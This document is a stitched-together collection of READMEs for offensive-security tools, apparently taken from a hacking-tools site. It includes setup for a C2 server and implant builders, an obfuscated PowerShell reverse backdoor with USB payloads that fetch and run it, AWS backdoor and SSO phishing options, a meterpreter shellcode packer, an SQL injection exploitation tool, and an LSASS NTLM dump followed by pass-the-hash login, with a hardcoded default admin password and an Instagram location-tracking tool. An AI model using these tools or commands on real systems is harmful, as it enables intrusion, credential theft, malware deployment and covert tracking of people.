DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default: 127.0.0.1)>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>

Note that SSL_KEY and SSL_CERT are optional. If any is not defined, a plain HTTP server will be created. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.

  1. Start the server;
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000

2. The Frontend

This is the web UI used by operators. It is a single page web application written in Svelte, and the source code is in the frontend/ directory.

To setup the frontend;

  1. Move into the source directory;
$ cd frontend
  1. Install dependencies;
$ npm install
  1. Create a .env file with the variable VITE_STRIKER_API set to the full URL of the C2 server as configured above;
VITE_STRIKER_API=https://c2.striker.local
  1. Build;
$ npm run build

The above will compile everything into a static web application in dist/ directory. You can move all the files inside into the web root of your web server, or even host it with a basic HTTP server like that of python;

$ cd dist
$ python3 -m http.server 8000
  1. Signup;
  • Open the site in a web browser. You should see a login page.
  • Click on the Register button.
  • Enter a username, password, and the registration key in use (see REGISTRATION_KEY in backend/.env)

This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually, afterwards you can upgrade and downgrade other accounts in the Users tab of the web UI.

To create your first admin account;

  • Connect to the MongoDB database used by the backend.
  • Update the users collection and set the admin field of the target user to true;

There are different ways you can do this. If you have mongo available in you CLI, you can do it using;

$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})

You should get the following response if it works;

{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }

You can now login :)

3. The C2 Redirector

A) Dumb Pipe Redirection

A dumb pipe redirector written for Striker is available at redirector/redirector.py. Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the INSECURE_SSL macro in the C agent).

The following example listens on port 443 on all interfaces and forward to c2.example.org on port 443;

$ cd redirector
$ ./redirector.py 0.0.0.0:443 c2.example.org:443
[*] Starting redirector on 0.0.0.0:443...
[+] Listening for connections...

B) Nginx Reverse Proxy as Redirector

  1. Install Nginx;
$ sudo apt install nginx
  1. Create a vhost config (e.g: /etc/nginx/sites-available/striker);

Placeholders;

  • <domain-name> - This is your server's FQDN, and should match the one in you SSL cert.
  • <ssl-cert> - The SSL cert file to use.
  • <ssl-key> - The SSL key file to use.
  • <c2-server> - The full URL of the C2 server to forward requests to.

WARNING: client_max_body_size should be as large as the size defined by MAX_UPLOAD_SIZE in your backend/.env file, or uploads for large files will fail.

server {
listen 443 ssl;
server_name <domain-name>;
ssl_certificate <ssl-cert>;
ssl_certificate_key <ssl-key>;
client_max_body_size 100M;
access_log /var/log/nginx/striker.log;

location / {
proxy_pass <c2-server>;
proxy_redirect off;
proxy_ssl_verify off;
proxy_read_timeout 90;
proxy_http_version 1.0;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
  1. Enable it;
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
  1. Restart Nginx;
$ sudo service nginx restart

Your redirector should now be up and running on port 443, and can be tested using (assuming your FQDN is striker.local);

$ curl https://striker.local

If it works, you should get the 404 response used by the backend, like;

{"error":"Invalid route!"}

4. The Agents (Implants)

A) The C Agent

These are the implants used by Striker. The primary agent is written in C, and is located in agent/C/. It supports both linux and windows hosts. The linux agent depends externally on libcurl, which you will find installed in most systems.

The windows agent does not have an external dependency. It uses wininet for comms, which I believe is available on all windows hosts.

  1. Building for linux

Assuming you're on a 64 bit host, the following will build for 64 host;

$ cd agent/C
$ mkdir bin
$ make

To build for 32 bit on 64;

$ sudo apt install gcc-multilib
$ make arch=32

The above compiles everything into the bin/ directory. You will need only two files to generate working implants;

  • bin/stub - This is the agent stub that will be used as template to generate working implants.
  • bin/builder - This is what you will use to patch the agent stub to generate working implants.

The builder accepts the following arguments;

$ ./bin/builder 
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>

Where;

  • <url> - The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.
  • <auth_key> - The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.
  • <delay> - Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.
  • <stub> - The stub file to read, bin/stub in this case.
  • <outfile> - The output filename of the new implant.

Example;

$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
  1. Building for windows

You will need MinGW for this. The following will install the 32 and 64 bit dev windows environment;

$ sudo apt install mingw-w64

Build for 64 bit;

$ cd agent/C
$ mdkir bin
$ make target=win

To compile for 32 bit;

$ make target=win arch=32

This will compile everything into the bin/ directory, and you will have the builder and the stub as bin\stub.exe and bin\builder.exe, respectively.

B) The Python Agent

Striker also comes with a self-contained python agent (tested on python 2.7.16 and 3.7.3). This is located at agent/python/. Only the most basic features are implemented in this agent. Useful for hosts that can't run the C agent but have python installed.

There are 2 file in this directory;

  • stub.py - This is the payload stub to pass to the builder.
  • builder.py - This is what you'll be using to generate an implant.

Usage example:

$ ./builder.py
[-] Usage: builder.py <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as `output.py`
$ ./builder.py http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2 stub.py output.py
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully: output.py
# Run it
$ python3 output.py

Getting Started

After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!

Support

If you like the project, consider helping me turn coffee into code!



Nmap-API - Uses Python3.10, Debian, python-Nmap, And Flask Framework To Create A Nmap API That Can Do Scans With A Good Speed Online And Is Easy To Deploy


Uses python3.10, Debian, python-Nmap, and flask framework to create a Nmap API that can do scans with a good speed online and is easy to deploy.

This is a implementation for our college PCL project which is still under development and constantly updating.


API Reference

Get all items

  GET /api/p1/{username}:{password}/{target}
GET /api/p2/{username}:{password}/{target}
GET /api/p3/{username}:{password}/{target}
GET /api/p4/{username}:{password}/{target}
GET /api/p5/{username}:{password}/{target}
Parameter Type Description
username string Required. username of the current user
password string Required. current user password
target string Required. The target Hostname and IP

Get item

  GET /api/p1/
GET /api/p2/
GET /api/p3/
GET /api/p4/
GET /api/p5/
Parameter Return data Description Nmap Command
p1 json Effective Scan -Pn -sV -T4 -O -F
p2 json Simple Scan -Pn -T4 -A -v
p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
p4 json Partial Intense Scan -Pn -p- -T4 -A -v
p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

Auth and User management

  POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}
  • make sure you use the ADMIN CREDS MENTIONED BELOW
Parameter Type Description
admin-username String Admin username
admin-passwd String Admin password
id String Id for newly added user
username String Username of the newly added user
passwd String Password of the newly added user
t-username String Target username
t-user-id String Target userID
t-userpass String Target users password
new-t-username String New username for the target
new-t-user-id String New userID for the target
new-t-userpass String New password for the target

DEFAULT CREDENTIALS

ADMINISTRATOR : zAp6_oO~t428)@,



ThunderCloud - Cloud Exploit Framework


Cloud Exploit Framework


Usage

python3 tc.py -h

_______ _ _ _____ _ _
|__ __| | | | / ____| | | |
| | | |__ _ _ _ __ __| | ___ _ __| | | | ___ _ _ __| |
| | | '_ \| | | | '_ \ / _` |/ _ \ '__| | | |/ _ \| | | |/ _` |
| | | | | | |_| | | | | (_| | __/ | | |____| | (_) | |_| | (_| |
\_/ |_| |_|\__,_|_| |_|\__,_|\___|_| \_____|_|\___/ \__,_|\__,_|


usage: tc.py [-h] [-ce COGNITO_ENDPOINT] [-reg REGION] [-accid AWS_ACCOUNT_ID] [-aws_key AWS_ACCESS_KEY] [-aws_secret AWS_SECRET_KEY] [-bdrole BACKDOOR_ROLE] [-sso SSO_URL] [-enum_roles ENUMERATE_ROLES] [-s3 S3_BUCKET_NAME]
[-conn_string CONNECTION_STRING] [-blob BLOB] [-shared_access_key SHARED_ACCESS_KEY]

Attack modules of cloud AWS

optional arguments:
-h, --help show this help message and exit
-ce COGNITO_ENDPOINT, --cognito_endpoint COGNITO_ENDPOINT
to verify if cognito endpoint is vulnerable and to extract credentials
-reg REGION, --region REGION
AWS region of the resource
-accid AWS_ACCOUNT_ID, --aws_account_id AWS_ACCOUNT_ID
AWS account of the victim
-aws_key AWS_ACCESS_KEY, --aws_access_key AWS_ACCESS_KEY
AWS access keys of the victim account
-aws_secret AWS_SECRET_KEY, --aws_secret_key AWS_SECRET_KEY
AWS secret key of the victim account
-bdrole BACKDOOR_ROLE, --backdoor_role BACKDOOR_ROLE
Name of the backdoor role in victim role
-sso SSO_URL, --sso_url SSO_URL
AWS SSO URL to phish for AWS credentials
-enum_roles ENUMERATE_ROLES, --enumerate_roles ENUMERATE_ROLES
To enumerate and assume account roles in victim AWS roles
-s3 S3_BUCKET_NAME, --s3_bucket_name S3_BUCKET_NAME
Execute upload attack on S3 bucket
-conn_string CONNECTION_STRING, --connection_string CONNECTION_STRING
Azure Shared Access key for readingservicebus/queues/blobs etc
-blob BLOB, --blob BLOB
Azure blob enumeration
-shared_access_key SHARED_ACCESS_KEY, --shared_access_key SHARED_ACCESS_KEY
Azure shared key

Requirements

* python 3
* pip
* git

Installation

 - get project `git clone https://github.com/Rnalter/ThunderCloud.git && cd ThunderCloud/`   
- install [virtualenv](https://virtualenv.pypa.io/en/latest/) `pip install virtualenv`
- create a python 3.6 local enviroment `virtualenv -p python3.6 venv`
- activate the virtual enviroment `source venv/bin/activate`
- install project dependencies `pip install -r requirements.txt`
- run the tool via `python tc.py --help`

Running ThunderCloud

Examples

python3 tc.py -sso <sso_url> --region <region>
python3 tc.py -ce <cognito_endpoint> --region <region>


IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


IpGeo is a python tool to extract IP addresses from captured network traffic file (pcap/pcapng) and generate csv report containing details about the geolocation of each ip in the packets.


The report contains:

  1. Country:
  2. Country Code.
  3. Region
  4. Region Name
  5. City
  6. Zip
  7. Latitude
  8. Longitude
  9. Timezone
  10. Isp
  11. Org
  12. Ip

Installation

Use the package manager pip3 to install required modules.

pip3 install colorama
pip3 install requests
pip3 install pyshark

If you are not using Kali or ParrotOs or any other penetration distribution you need to install Tshark.

sudo apt install tshark

Usage

python3 ipGeo.py
# then you will enter captured traffic file path


Tracgram - Use Instagram Location Features To Track An Account


Trackgram Use Instagram location features to track an account

Usage

At this moment the usage of Trackgram is extremly simple:

1. Download this repository

2. Go through the instalation steps

3. Change the parameters in the tracgram main method directly:
+ Mandatory:
- NICKNAME: your username on Instagram
- PASSWORD: your instagram password
- OBJECTIVE: your objective username

+ Optional:
- path_to_csv: the path were the csv file will be stored, including the name


4. Execute it with python3 tracgram.py

Installation steps

  1. Download with $ git clone https://github.com/initzerCreations/Tracgram

  2. Install dependencies using pip install -r requirements.txt

  3. Congrats! by now you should be able to run it: python3 tracgram.py

Screenshots

Features

  1. Provides a heatmap based on the location frequency

  2. Markers displayed on the heatmap indicating:

    • Exact location name
    • Time when relate post was made
    • Link to Google Maps address
  3. Graph relating the posts count for an specific location

  4. Generate a easy to process .CSV file



Powershell-Backdoor-Generator - Obfuscated Powershell Reverse Backdoor With Flipper Zero And USB Rubber Ducky Payloads


Reverse backdoor written in Powershell and obfuscated with Python. Allowing the backdoor to have a new signature after every run. Also can generate auto run scripts for Flipper Zero and USB Rubber Ducky.

usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL convers ion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory

Features

  • Hak5 Rubber Ducky payload
  • Flipper Zero payload
  • Download Files from remote system
  • Fetch target computers public IP address
  • List local users
  • Find Intresting Files
  • Get OS Information
  • Get BIOS Information
  • Get Anti-Virus Status
  • Get Active TCP Clients
  • Checks for common pentesting software installed

Standard backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file in the current working directory will be created called backdoor.ps1

Bad USB/ USB Rubber Ducky attacks

When using any of these attacks you will be opening up a HTTP server hosting the backdoor. Once the backdoor is retrieved the HTTP server will be shutdown.

Payloads

  • Execute -- Execute the backdoor
  • BindAndExecute -- Place the backdoor in temp, bind the backdoor to startup and then execute it.

Flipper Zero Backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor.txt --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Place the text file you specified (e.g: powershell_backdoor.txt) into your flipper zero. When the payload is executed it will download and execute backdoor.ps1

Usb Rubber Ducky Backdoor

 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file named inject.bin will be placed in your current working directory. Java is required for this feature. When the payload is executed it will download and execute backdoor.ps1

Backdoor Execution

Tested on Windows 11, Windows 10 and Kali Linux

powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
โ”Œโ”€โ”€(drewใ‰ฟkali)-[/home/drew/Documents]
โ””โ”€PS> ./backdoor.ps1

To Do

  • Add Standard Backdoor
  • Find Writeable Directories
  • Get Windows Update Status

Output of 5 obfuscations/Runs

sha1:c7a5fa3e56640ce48dcc3e8d972e444d9cdd2306
sha1:b32dab7b26cdf6b9548baea6f3cfe5b8f326ceda
sha1:e49ab36a7ad6b9fc195b4130164a508432f347db
sha1:ba40fa061a93cf2ac5b6f2480f6aab4979bd211b
sha1:f2e43320403fb11573178915b7e1f258e7c1b3f0


Darkdump2 - Search The Deep Web Straight From Your Terminal



About Darkdump (Recent Notice - 12/27/22)

Darkdump is a simple script written in Python3.11 in which it allows users to enter a search term (query) in the command line and darkdump will pull all the deep web sites relating to that query. Darkdump2.0 is here, enjoy!

Installation

  1. git clone https://github.com/josh0xA/darkdump
  2. cd darkdump
  3. python3 -m pip install -r requirements.txt
  4. python3 darkdump.py --help

Usage

Example 1: python3 darkdump.py --query programming
Example 2: python3 darkdump.py --query="chat rooms"
Example 3: python3 darkdump.py --query hackers --amount 12

  • Note: The 'amount' argument filters the number of results outputted

Usage With Increased Anonymity

Darkdump Proxy: python3 darkdump.py --query bitcoin -p

Menu


____ _ _
| \ ___ ___| |_ _| |_ _ _____ ___
| | | .'| _| '_| . | | | | . |
|____/|__,|_| |_,_|___|___|_|_|_| _|
|_|

Developed By: Josh Schiavone
https://github.com/josh0xA
joshschiavone.com
Version 2.0

usage: darkdump.py [-h] [-v] [-q QUERY] [-a AMOUNT] [-p]

options:
-h, --help show this help message and exit
-v, --version returns darkdump's version
-q QUERY, --query QUERY
the keyword or string you want to search on the deepweb
-a AMOUNT, --amount AMOUNT
the amount of results you want to retrieve (default: 10)
-p, --proxy use darkdump proxy to increase anonymity

Visual

Ethical Notice

The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Do not use darkdump to navigate websites that take part in any activity that is identified as illegal under the laws and regulations of your government. May God bless you all.

License

MIT License
Copyright (c) Josh Schiavone



Monomorph - MD5-Monomorphic Shellcode Packer - All Payloads Have The Same MD5 Hash

                                                
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•
โ•”โ•โ•ฆโ•โ•— โ•”โ•โ•— โ•”โ•โ•— โ•”โ•โ•— โ•”โ•โ•ฆโ•โ•— โ•”โ•โ•— โ•”โ•โ•โ•”โ•โ•— โ• โ•โ•—
โ•โ•ฉ โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ• โ•โ•โ•โ•ฉ โ•ฉโ•
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฉโ•โ•โ•โ•โ•โ•โ•
By Retr0id

โ•โ•โ• MD5-Monomorphic Shellcode Packer โ• โ•โ•


USAGE: python3 monomorph.py input_file output_file [payload_file]

What does it do?

It packs up to 4KB of compressed shellcode into an executable binary, near-instantly. The output file will always have the same MD5 hash: 3cebbe60d91ce760409bbe513593e401

Currently, only Linux x86-64 is supported. It would be trivial to port this technique to other platforms, although each version would end up with a different MD5. It would also be possible to use a multi-platform polyglot file like APE.

Example usage:

$ python3 monomorph.py bin/monomorph.linux.x86-64.benign bin/monomorph.linux.x86-64.meterpreter sample_payloads/bin/linux.x64.meterpreter.bind_tcp.bin

Why?

People have previously used single collisions to toggle a binary between "good" and "evil" modes. Monomorph takes this concept to the next level.

Some people still insist on using MD5 to reference file samples, for various reasons that don't make sense to me. If any of these people end up investigating code packed using Monomorph, they're going to get very confused.

How does it work?

For every bit we want to encode, a colliding MD5 block has been pre-calculated using FastColl. As summarised here, each collision gives us a pair of blocks that we can swap out without changing the overall MD5 hash. The loader checks which block was chosen at runtime, to decode the bit.

To encode 4KB of data, we need to generate 4*1024*8 collisions (which takes a few hours), taking up 4MB of space in the final file.

To speed this up, I made some small tweaks to FastColl to make it even faster in practice, enabling it to be run in parallel. I'm sure there are smarter ways to parallelise it, but my naive approach is to start N instances simultaneously and wait for the first one to complete, then kill all the others.

Since I've already done the pre-computation, reconfiguring the payload can be done near-instantly. Swapping the state of the pre-computed blocks is done using a technique implemented by Ange Albertini.

Is it detectable?

Yes. It's not very stealthy at all, nor does it try to be. You can detect the collision blocks using detectcoll.



Ghauri - An Advanced Cross-Platform Tool That Automates The Process Of Detecting And Exploiting SQL Injection Security Flaws


An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws


Requirements

  • Python 3
  • Python pip3

Installation

  • cd to ghauri directory.
  • install requirements: python3 -m pip install --upgrade -r requirements.txt
  • run: python3 setup.py install or python3 -m pip install -e .
  • you will be able to access and run the ghauri with simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

  • Supports following types of injection payloads:
    • Boolean based.
    • Error Based
    • Time Based
    • Stacked Queries
  • Support SQL injection for following DBMS.
    • MySQL
    • Microsoft SQL Server
    • Postgre
    • Oracle
  • Supports following injection types.
    • GET/POST Based injections
    • Headers Based injections
    • Cookies Based injections
    • Mulitipart Form data injections
    • JSON based injections
  • support proxy option --proxy.
  • supports parsing request from txt file: switch for that -r file.txt
  • supports limiting data extraction for dbs/tables/columns/dump: swicth --start 1 --stop 2
  • added support for resuming of all phases.
  • added support for skip urlencoding switch: --skip-urlencode
  • added support to verify extracted characters in case of boolean/time based injections.

Advanced Usage


Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform python based advanced sql injections detection & exploitation tool.

General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target

Target:
At least one of these options has to be provided to define the
target(s)

-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1).
-r REQUESTFILE Load HTTP request from a file

Request:
These options can be used to specify how to connect to the target URL

-A , --user-agent HTTP User-Agent header value -H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS

Injection:
These options can be used to specify which paramete rs to test for,
provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string

Detection:
These options can be used to customize the detection phase

--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content

Techniques:
These options can be used to tweak testing of specific SQL injection
techniques

--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)

Enumeration:
These options can be used to enumerate the back-end database
managment system information, structure and data contained in the
tables.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database tables(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrive entries from offset for dbs/tables/columns/dump
--stop Retrive entries till offset for dbs/tables/columns/dump

Example:
ghauri http://www.site.com/vuln.php?id=1 --dbs

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local,state and federal laws.
Developer assume no liability and is not responsible for any misuse or damage caused by this program.

TODO

  • Add support for inline queries.
  • Add support for Union based queries


DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process


A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.

The DLLMain always returns False so the processes doesn't keep it.


Caveats

It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:

Build Support
Windows 10 version 21H2
Windows 10 version 21H1 Implemented
Windows 10 version 20H2 Implemented
Windows 10 version 20H1 (2004) Implemented
Windows 10 version 1909 Implemented
Windows 10 version 1903 Implemented
Windows 10 version 1809 Implemented
Windows 10 version 1803 Implemented
Windows 10 version 1709 Implemented
Windows 10 version 1703 Implemented
Windows 10 version 1607 Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -local-dll dll to plant DLL location (local) that will be planted on target -remote-dll dll location Path used to update AutodialDLL registry value" dir="auto">
psyconauta@insulanova:~/Research/dragoncastle|โ‡’  python3 dragoncastle.py -h                                                                                                                                            
DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
valid username
-p PASSWORD, --password PASSWORD
valid password (if omitted, it will be asked unless -no-pass)
-d DOMAIN, --domain DOMAIN
valid doma in name
-hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-local-dll dll to plant
DLL location (local) that will be planted on target
-remote-dll dll location
Path used to update AutodialDLL registry value
</ pre>

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|โ‡’  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977 b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:

============
[+] Deleting DLL

[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|โ‡’  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivile ge Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
